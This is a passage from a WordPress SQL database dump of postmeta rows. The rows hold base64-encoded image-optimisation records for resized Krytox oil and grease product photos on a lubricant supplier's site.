J1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjY0NywidGltZSI6MTQ4MzU3NjMxMSwiaWQiOjEwODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtcGZwZS1vaWwtZ3JlYXNlLWdwbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ2MSwidGltZSI6MTQ4MzU3NjMxNCwiaWQiOjEwODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtcGZwZS1vaWwtZ3JlYXNlLWdwbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjUwNSwidGltZSI6MTQ4MzU3NjMxNywiaWQiOjEwODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtcGZwZS1vaWwtZ3JlYXNlLWdwbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUzNywidGltZSI6MTQ4MzU3NjMyMSwiaWQiOjEwODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtcGZwZS1vaWwtZ3JlYXNlLWdwbC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU1NiwidGltZSI6MTQ4MzU3NjMyNSwiaWQiOjEwODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtcGZwZS1vaWwtZ3JlYXNlLWdwbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYzMCwidGltZSI6MTQ4MzU3NjMyOCwiaWQiOjEwODd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtcGZwZS1vaWwtZ3JlYXNlLWdwbC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1wZnBlLW9pbC1ncmVhc2UtZ3BsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXBmcGUtb2lsLWdyZWFzZS1ncGwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjcyMCwidGltZSI6MTQ4MzU3NjMzMiwiaWQiOjEwODd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29762, 1086, 'wpfc_optimisation_reduction', '26383'); 
INSERT INTO `wp_postmeta` VALUES (29763, 1086, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS5qcGciLCJ3aWR0aCI6NjAxNiwiaGVpZ2h0Ijo0MDE2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc2MzM3LCJpZCI6IjEwODYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MTE1MywidGltZSI6MTQ4MzU3NjM0MCwiaWQiOjEwODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjoyOTI2LCJ0aW1lIjoxNDgzNTc2MzQ0LCJpZCI6MTA4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS03Njh4NTEzLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtNzY4eDUxMy5qcGciLCJyZWR1Y3Rpb24iOjI3NTEsInRpbWUiOjE0ODM1NzYzNDksImlkIjoxMDg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0xNjAweDEwNjguanBnIiwicmVkdWN0aW9uIjo4MzY4LCJ0aW1lIjoxNDgzNTc2MzU0LCJpZCI6MTA4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjkxNCwidGltZSI6MTQ4MzU3NjM1NywiaWQiOjEwODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NzIsInRpbWUiOjE0ODM1NzYzNjAsImlkIjoxMDg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjgyLCJ0aW1lIjoxNDgzNTc2MzY0LCJpZCI6MTA4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjI2ODAsInRpbWUiOjE0ODM1NzYzNjgsImlkIjoxMDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1NTQsInRpbWUiOjE0ODM1NzYzNzEsImlkIjoxMDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2NDUsInRpbWUiOjE0ODM1NzYzNzQsImlkIjoxMDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo3MDcsInRpbWUiOjE0ODM1NzYzNzgsImlkIjoxMDg2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxMjAyLCJ0aW1lIjoxNDgzNTc2MzgxLCJpZCI6MTA4Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTM0OSwidGltZSI6MTQ4MzU3NjM4NSwiaWQiOjEwODZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2UtcGZwZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZS1wZnBlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlLXBmcGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjE4ODAsInRpbWUiOjE0ODM1NzYzODksImlkIjoxMDg2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29764, 1085, 'wpfc_optimisation_reduction', '13836'); 
INSERT INTO `wp_postmeta` VALUES (29765, 1085, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTUuanBnIiwid2lkdGgiOjQ0OTYsImhlaWdodCI6MzAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NjM5MywiaWQiOiIxMDg1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2U1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlNS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY4NSwidGltZSI6MTQ4MzU3NjM5NywiaWQiOjEwODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlNS04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTUtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2U1LTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjoxMzUzLCJ0aW1lIjoxNDgzNTc2NDAxLCJpZCI6MTA4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZ3BsLW9pbC1ncmVhc2U1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWdwbC1vaWwtZ3JlYXNlNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1ncGwtb2lsLWdyZWFzZTUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEzNDMsInRpbWUiOjE0O